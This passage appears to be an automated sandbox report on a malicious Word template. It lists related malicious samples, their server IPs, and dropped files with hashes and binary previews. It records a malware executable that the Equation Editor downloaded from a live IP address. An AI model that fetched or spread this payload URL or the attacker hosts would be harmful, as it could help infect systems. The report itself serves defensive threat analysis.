                                                                                                                                              • 54.36.27.31
                                                                                                                                              Ewkoo9igCN.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              49Bvnq7iFK.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              OtOXfybCmW.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              Ewkoo9igCN.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              W3aLwWHvWB.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              IJh1SAcSNP.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              OtOXfybCmW.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              afC9TbiOWl.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              wABiemJeyB.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              I316Yh2noM.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              W3aLwWHvWB.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              IJh1SAcSNP.dllGet hashmaliciousBrowse
                                                                                                                                              • 51.91.76.89
                                                                                                                                              AS-COLOCROSSINGUSdot.dotGet hashmaliciousBrowse
                                                                                                                                              • 23.95.122.24
                                                                                                                                              New Order for April#89032.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.174.104
                                                                                                                                              PO PR 111500976.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.213.61
                                                                                                                                              Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.207.115
                                                                                                                                              7yTix20XaT.rtfGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              Inquiry.docxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              order1562.docxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              order1562.docxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              lF5VYmf6Tm.exeGet hashmaliciousBrowse
                                                                                                                                              • 192.3.26.107
                                                                                                                                              P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.46.132.132
                                                                                                                                              Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.174.104
                                                                                                                                              0f0mccRNrP.exeGet hashmaliciousBrowse
                                                                                                                                              • 192.3.26.107
                                                                                                                                              R6G6EFOeOE.rtfGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              NEW ORDER PO.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.213.57
                                                                                                                                              uIIHdM0MHt.rtfGet hashmaliciousBrowse
                                                                                                                                              • 198.23.174.104
                                                                                                                                              New purchase Order_Invoice payment info and shipping documents.docxGet hashmaliciousBrowse
                                                                                                                                              • 198.23.251.121
                                                                                                                                              SecuriteInfo.com.Packed-GDKD3066D931944.20107.exeGet hashmaliciousBrowse
                                                                                                                                              • 192.3.26.107
                                                                                                                                              SecuriteInfo.com.W32.AIDetect.malware1.1169.exeGet hashmaliciousBrowse
                                                                                                                                              • 192.3.26.107
                                                                                                                                              4i1GUIgglX.exeGet hashmaliciousBrowse
                                                                                                                                              • 192.210.198.12
                                                                                                                                              ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                                                              • 107.173.219.80

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exedot.dotGet hashmaliciousBrowse
                                                                                                                                                C:\Users\Public\vbc.exedot.dotGet hashmaliciousBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):144008
                                                                                                                                                  Entropy (8bit):0.3098262771776558
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:KaBdAQUpUw4Qn8apiKrSBrTTJDBJRuv9Dzz3DaDPDv9Dzz3DaDPaR270hE3xvA:hjAQUpn4QnTUVKIq3K
                                                                                                                                                  MD5:6DB8CD96B4C85B119FD1C5B854A23016
                                                                                                                                                  SHA1:74E2EFBB0C5EC24C8945BBDACE3C1F37433E2763
                                                                                                                                                  SHA-256:E2B7AF33C81B0725788BEE74791BF3C3AB509659FF1B4FB24EB606AF885B63D8
                                                                                                                                                  SHA-512:FF6669D646F42FB0D1008A0E5378CBA7460588CEE1CCFE68DF9DEFC4883AF5295C7F6B69BB86895AC38EEEB44C65D1501DE94788C8977F53632EBC8C3C49FA98
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ......M.eFy...z.]c..X.L.u!..=Q.S,...X.F...Fa.q..............................}|.#.H..).3/.............(O.EB.|..ZqIE....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BBF4E4AC-D3FE-4235-914F-E64626B221A9}.FSD
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):156816
                                                                                                                                                  Entropy (8bit):0.6596008829655113
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:K4H1V9UGUUP80UP6RYy0u7YFwQ5enwJJloT+DV9yHrnj9ZLRNM0pgSKTgSK+mniv:Act7SjKSorMIuUiKpw
                                                                                                                                                  MD5:F9C192CF1A2AA18A2EEF25F8D00AA502
                                                                                                                                                  SHA1:6334110BACAA7F22FDF3F1B89E49A3B0449615D8
                                                                                                                                                  SHA-256:E81EF857EC9E51A8864218C434827A17B0F5ED7C0DBFEB5D19EDE33F5BB33518
                                                                                                                                                  SHA-512:1FDBA5629C084ED5E05B62830DC1559F4F80935429B3100BD63C84F554AFFF5BD15A5DD39E88456F73A88E001DC31D17C71DD812C08E6AE958ABB85F991D0CF5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ......M.eFy...z.x/.A.@J...|C5<.S,...X.F...Fa.q............................X.m<!,^C..}.N..C........,...Z.O.o+.........................................................................t...t...t...t..............................................................................................................................................................................................................................................................................................................................$hg~E.m...4&.........,...Z.O.o+.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133
                                                                                                                                                  Entropy (8bit):4.228766108684801
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:yVlgQPDRlgsRlz4RHWzij6SlLM3lNLLh3plU+lFZ276:yPdPDDblz4RHWpSq3lNe+J22
                                                                                                                                                  MD5:8E89C48D746C11FEA804C52D0881BDAA
                                                                                                                                                  SHA1:216261EE5B07A5701F888EBF3485A1B2668B114A
                                                                                                                                                  SHA-256:25F668C71F47BA804180E2BF2CB3812D662AE9D1CC3451D56C7C40047D700AC9
                                                                                                                                                  SHA-512:F4321234AC52771ECF5B58C1E15D1B35CBBB09E13F8B1EBA31B4CA1426AB1196A4DBECE6DA09A46EB6A5DC483F588B8AD931C85A4BFB17CEE5D0A6111B6792EA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ..H..@....b..q.....H..@....b..q....]F.S.D.-.{.B.B.F.4.E.4.A.C.-.D.3.F.E.-.4.2.3.5.-.9.1.4.F.-.E.6.4.6.2.6.B.2.2.1.A.9.}...F.S.D..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):144008
                                                                                                                                                  Entropy (8bit):0.305976323984198
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:34VtM56CKjqUxUpK4IAYqqUxUpK4IAYX5m1kt:oqTq
                                                                                                                                                  MD5:C1A68D7886D4521B3D0A82B54BC64BD3
                                                                                                                                                  SHA1:57BCE888FB80B07B86F079E60711BE21195CAA44
                                                                                                                                                  SHA-256:07389D13244E78927034E12F50F65215243278CEF49AA0B5D920668CD7DD421D
                                                                                                                                                  SHA-512:12ACDAA755ACBC9D5B5A787083F48E541DA0420CFCE17318919515494F1ADD4F363063278B1D6E578A9E8D986ADF7C0A3CECBBC8EEBAB5D5AFE6354940010036
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ......M.eFy...zb...mOTO...0O...S,...X.F...Fa.q.............................xl...G.B."*.............j....J....,.......................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0FF8CE56-196E-41FE-8549-99098D12EE98}.FSD
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):149973
                                                                                                                                                  Entropy (8bit):0.2784291666095703
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:I3s8BPwNoUYT9ja3f9jVYq8VGotRP008NnHgJR2Mh5uGZ:KsiBJ8B1mZ58
                                                                                                                                                  MD5:B18103AA0D6EEA8856232FC898D97E5E
                                                                                                                                                  SHA1:26402AF85EDC2D27C35AD596062221F59F36C5FD
                                                                                                                                                  SHA-256:9D1E3BBC512969B394953AFC777FD57E9623505811F4F68D0AAF9B131A392AC7
                                                                                                                                                  SHA-512:1B2C0112AB71BD54CB16DE9632528801D7D1E41A0436E24F335A01C4DFCEB2767EF795A79381F79D25260762F32B367FA03F5CF49EBB93A07EED6071846EAC6B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ......M.eFy...zM.[..2.D.0.G../.S,...X.F...Fa.q............................N...]Z,@................=yfB.G..C+.*P.....................................................................t...t...t...t...........................................................................................................................................................................................................................................................................................................................]..u...L..}..............=yfB.G..C+.*P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133
                                                                                                                                                  Entropy (8bit):4.183653326729914
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:yVlgQPDRlgsRlz0OwpIOAhOkSlwAYczlygCf276:yPdPDDblz0tmOFkS7JygK22
                                                                                                                                                  MD5:2F501DC5F7800E311E86D84AAE819491
                                                                                                                                                  SHA1:2CF0729178CC544847F42195AB8AC122FADCABD2
                                                                                                                                                  SHA-256:1B594DE9AE52DF312BB9D8329B9F01594342B75A2CD49CB0156F58A5C7D2B19E
                                                                                                                                                  SHA-512:3EED54E9C9E369F1C0A30B2929A003527E114DCAEE7C538133A59737B5EA4A0CDAFEAE26BF1E9A4DCA52594CBB06A8E2D74B1D1ECCCBC948131ED39E11CB7C79
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ..H..@....b..q.....H..@....b..q....]F.S.D.-.{.0.F.F.8.C.E.5.6.-.1.9.6.E.-.4.1.F.E.-.8.5.4.9.-.9.9.0.9.8.D.1.2.E.E.9.8.}...F.S.D..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):387072
                                                                                                                                                  Entropy (8bit):6.9572597315329805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                  MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                  SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                  SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                  SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: dot.dot, Detection: malicious, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://23.95.122.24/zyo/vbc.exe
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z1MU4GXL.dot
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:Rich Text Format data, unknown version
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):12899
                                                                                                                                                  Entropy (8bit):5.628188977802884
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
                                                                                                                                                  MD5:40F03856876FDA8B3BDA880D1D5A4636
                                                                                                                                                  SHA1:D252C054154C5524DFBF3F3238B32F711290FD36
                                                                                                                                                  SHA-256:A4358B898C41852211EE727E4B8C0D05301BF4C6A90A4780C5A6F8B1B1CF5C81
                                                                                                                                                  SHA-512:559A93F09A07A3AA13FFCE038EF2D47A1B73EF6301FD2799A9B3CAE99B3E7B652E65951A318CBE7BC31AE25FFEB05C644B08F306553EC9C70B4E60794E1E6687
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot
                                                                                                                                                  Preview: {\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?*/:]@6!4'``9.($4|'%;!!6|5?9.<@:;+[^~#%'|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?|,,?;//)#%&..|%?02>9>|._4*,/&]9?&1-!..|0&.@?.88?%%;;(3`8?[*.+*^4&29|%5*|?1|%=1]^+)([,-.?0^@)#:*5?^'_?8[9?.?++-4!_9,.%..3;~?&$#;%=6+53~<.30|4|@7'/=:-4;>`':,%`0[?`1?-???+=:[?*?+6'?'<|1?:4&;+>.^)||%58=|).4<.84</'%_93,@[;?70[?5%.;![.?:2~-6-%$?_?64[?=7/???<9.'2|.3?[?2?;!75.*_?7?3,`'8-6??.6.).)'?1<=..]!%98-1?$70%?5?|.6|$=!=5!14$@'.%>][?163?)5+.56[=%479[.]`7':%.<?$-837|=.`-.?3%?|?)*!6=^,5<=?|[)>*=%%~8../;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8..5/4`!#@$@?-807-(??:*..85'?`.?[~7%-/*8<;&5#?323~<.>=8';??-8?0?3^??.~1.%4`.?$?%9.=;~57).^?$:)[.780-.?.*8.1.>?%=[7#%8;*`3;(03'.8#?*?9>9'#0-,+/=.%?*&9-?+8~.1)'*32?@;`~1?(2~%8[>^)?![%*3/?)>?6#.;#?[;>.-?,<+29:=?_2%+3)5),).;9*2@/3)=>.+#.3|%0.]3<!&[,~/69,?.?^0,~1.;,;^?%?%.1@_~@?-?99|^19$#%|#]:**.737%]?%?+/)?[?%13..1%1.@%,'#;<(;![13>%!,3-.![%&']7:?65;33|]<?0@:-.'2^&?-.</<'7?=@?$(^*33]%0:2?.&_?!4<
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9585664.dot
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:Rich Text Format data, unknown version
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12899
                                                                                                                                                  Entropy (8bit):5.628188977802884
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
                                                                                                                                                  MD5:40F03856876FDA8B3BDA880D1D5A4636
                                                                                                                                                  SHA1:D252C054154C5524DFBF3F3238B32F711290FD36
                                                                                                                                                  SHA-256:A4358B898C41852211EE727E4B8C0D05301BF4C6A90A4780C5A6F8B1B1CF5C81
                                                                                                                                                  SHA-512:559A93F09A07A3AA13FFCE038EF2D47A1B73EF6301FD2799A9B3CAE99B3E7B652E65951A318CBE7BC31AE25FFEB05C644B08F306553EC9C70B4E60794E1E6687
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: {\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?*/:]@6!4'``9.($4|'%;!!6|5?9.<@:;+[^~#%'|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?|,,?;//)#%&..|%?02>9>|._4*,/&]9?&1-!..|0&.@?.88?%%;;(3`8?[*.+*^4&29|%5*|?1|%=1]^+)([,-.?0^@)#:*5?^'_?8[9?.?++-4!_9,.%..3;~?&$#;%=6+53~<.30|4|@7'/=:-4;>`':,%`0[?`1?-???+=:[?*?+6'?'<|1?:4&;+>.^)||%58=|).4<.84</'%_93,@[;?70[?5%.;![.?:2~-6-%$?_?64[?=7/???<9.'2|.3?[?2?;!75.*_?7?3,`'8-6??.6.).)'?1<=..]!%98-1?$70%?5?|.6|$=!=5!14$@'.%>][?163?)5+.56[=%479[.]`7':%.<?$-837|=.`-.?3%?|?)*!6=^,5<=?|[)>*=%%~8../;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8..5/4`!#@$@?-807-(??:*..85'?`.?[~7%-/*8<;&5#?323~<.>=8';??-8?0?3^??.~1.%4`.?$?%9.=;~57).^?$:)[.780-.?.*8.1.>?%=[7#%8;*`3;(03'.8#?*?9>9'#0-,+/=.%?*&9-?+8~.1)'*32?@;`~1?(2~%8[>^)?![%*3/?)>?6#.;#?[;>.-?,<+29:=?_2%+3)5),).;9*2@/3)=>.+#.3|%0.]3<!&[,~/69,?.?^0,~1.;,;^?%?%.1@_~@?-?99|^19$#%|#]:**.737%]?%?+/)?[?%13..1%1.@%,'#;<(;![13>%!,3-.![%&']7:?65;33|]<?0@:-.'2^&?-.</<'7?=@?$(^*33]%0:2?.&_?!4<
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8FD7-8909E0160183}.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:dBase III DBT, version number 0, next free block index 7536653
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.10581667566270775
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Ghl/dlYdn:Gh2n
                                                                                                                                                  MD5:28ADF62789FD86C3D04877B2D607E000
                                                                                                                                                  SHA1:A62F70A7B17863E69759A6720E75FC80E12B46E6
                                                                                                                                                  SHA-256:0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
                                                                                                                                                  SHA-512:15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24814E40-30CA-4646-ACFF-79FC9E14ADCB}.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D2384D6F-8836-4311-8D36-3954D2EB570F}.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16896
                                                                                                                                                  Entropy (8bit):3.638204091860009
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:3rOmx7l0ugn8SIWlnrAc+zxPKbJB9C54wCpj2LxwMhVEwvk4Pw:3rOmx7Z5Un0c+NKpq1Uj5MDE6Pw
                                                                                                                                                  MD5:23F1AC7DB1600320D6CE2850F3D9249B
                                                                                                                                                  SHA1:DDC40E4D9B52AE057E75EA9CB05F4A974C0AB617
                                                                                                                                                  SHA-256:F8DBD12BE3629F58B4AF662A9CC7E21768C3664CDD694792164D7153EF7C0C0B
                                                                                                                                                  SHA-512:193F75B27A31F465BD80868895B4CE2F7AE1827C5DEEE16466DBC73ADB6E47DECC56D53E5440740AE7850FDA1210B6B2BD023ABBFDD30CE850139FE9D98A6842
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: &.?.^.:.4.9.9.?.9.%...7.4.&...0.~...;.@.?.!...?.>...~.'.6.:.#..._.<...(.8.).-.?.*./.:.].@.6.!.4.'.`.`.9...(.$.4.|.'.%.;.!.!.6.|.5.?.9...<.@.:.;.+.[.^.~.#.%.'.|.^.?.....].5.=.%.7.7.^.:._.<.3./.5.?.>.~.:.<./.8.2.;.>...?.>.?.5.<.?.`.`._.|.~...>.>.?.@.2.'._.%.1.:.?.3.$.?.#.$.7.4.#.+.8.?.@.?.7.!.3.?.;.?.4.?.|.,.,.?.;././.).#.%.&.....|.%.?.0.2.>.9.>.|..._.4.*.,./.&.].9.?.&.1.-.!.....|.0.&...@.?...8.8.?.%.%.;.;.(.3.`.8.?.[.*...+.*.^.4.&.2.9.|.%.5.*.|.?.1.|.%.=.1.].^.+.).(.[.,.-...?.0.^.@.).#.:.*.5.?.^.'._.?.8.[.9.?...?.+.+.-.4.!._.9.,...%.....3.;.~.?.&.$.#.;.%.=.6.+.5.3.~.<...3.0.|.4.|.@.7.'./.=.:.-.4.;.>.`.'.:.,.%.`.0.[.?.`.1.?.-.?.?.?.+.=.:.[.?.*.?.+.6.'.?.'.<.|.1.?.:.4.&.;.+.>...^.).|.|.%.5.8.=.|.)...4.<...8.4.<./.'.%._.9.3.,.@.[.;.?.7.0.[.?.5.%...;.!.[...?.:.2.~.-.6.-.%.$.?._.?.6.4.[.?.=.7./.?.?.?.<.9...'.2.|...3.?.[.?.2.?.;.!.7.5...*._.?.7.?.3.,.`.'.8.-.6.?.?...6...)...).'.?.1.<.=.....].!.%.9.8.-.1.?.$.7.0.%.?.5.?.|...6.|.$.=.!.=.5.!.1.4.$.@.'...%.>.].[.?.1.6.3.?.).5.+...5.6.[.=.%.4.7.9.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1C9178E2-878F-41DC-A2DA-5DC2C3F4A84B}
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):137348
                                                                                                                                                  Entropy (8bit):0.05990522701123808
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:I3DP84TK7NCfv8p/eR1P84TKbThlQvSQapO0fmuRo6/7yP84TKAxXQuKp:I3cNT/umlQvq7fmXQB
                                                                                                                                                  MD5:4D6E76FC3F17F88B29F9510EAEC618F0
                                                                                                                                                  SHA1:1BC12ACA14DB8234EAF370EBA124F72349978D08
                                                                                                                                                  SHA-256:E9AE520B79C76971B6ACC434C4A99BE471FBBF5EA88EE908CF88F376169B52ED
                                                                                                                                                  SHA-512:85F6836B31B0B246127027AE57572748EDA6DB637B84B1F161EB6D6A5E42085B8326E6215F3FAD131027104804C19E65F461BFE14FBD2B03C6146BA4209D33D2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......M.eFy...z.]c..X.L.u!..=Q.S,...X.F...Fa.q.............................'lN`x.I..x=b=.1...........(O.EB.|..ZqIE....................................................................t...t...t...t...........................................................................................................................................................................................................................................................................................................................k..\...C.GD..Y.v...........(O.EB.|..ZqIE................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A39B5EA0-B931-48AE-A182-26B457E12238}
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):137348
                                                                                                                                                  Entropy (8bit):0.05940107324631241
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:I3DP0yYvshfv8pvI1P0yYgbLuSQap3ttO/7yP0yYcsnRKp:I3uxAVeqfdx
                                                                                                                                                  MD5:A9E98123C36986634228A6B4DF1F01AD
                                                                                                                                                  SHA1:B8D2423B8D46BF2F219E659BAB7C45CBEFEC53D0
                                                                                                                                                  SHA-256:75C0DA02749FC6DD69B5BDE84F77A64551BB325B39CA96757BABCD7C245028B3
                                                                                                                                                  SHA-512:E9974DEA2FD6BCE445E8B08B7FB6B4754E03060D8949EE2FDA4DD51548B97311DF8B628274C97E1E51B654A65076C65FB00B9032E23A88B857B900FB93C2802E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......M.eFy...zb...mOTO...0O...S,...X.F...Fa.q................................5.O.../..............j....J....,.......................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................,nE.r.l..P...........j....J....,...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- on 23.95.122.24.url
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/>), ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):104
                                                                                                                                                  Entropy (8bit):3.5598567524029425
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:HRAbABGQYm/ehLOXGa2NCECOCDL8u:HRYFVm/K4GamM
                                                                                                                                                  MD5:9068824ABC5363BBBB1BC24BDC796847
                                                                                                                                                  SHA1:3234BF172D79876FDA384D7326F000847961F145
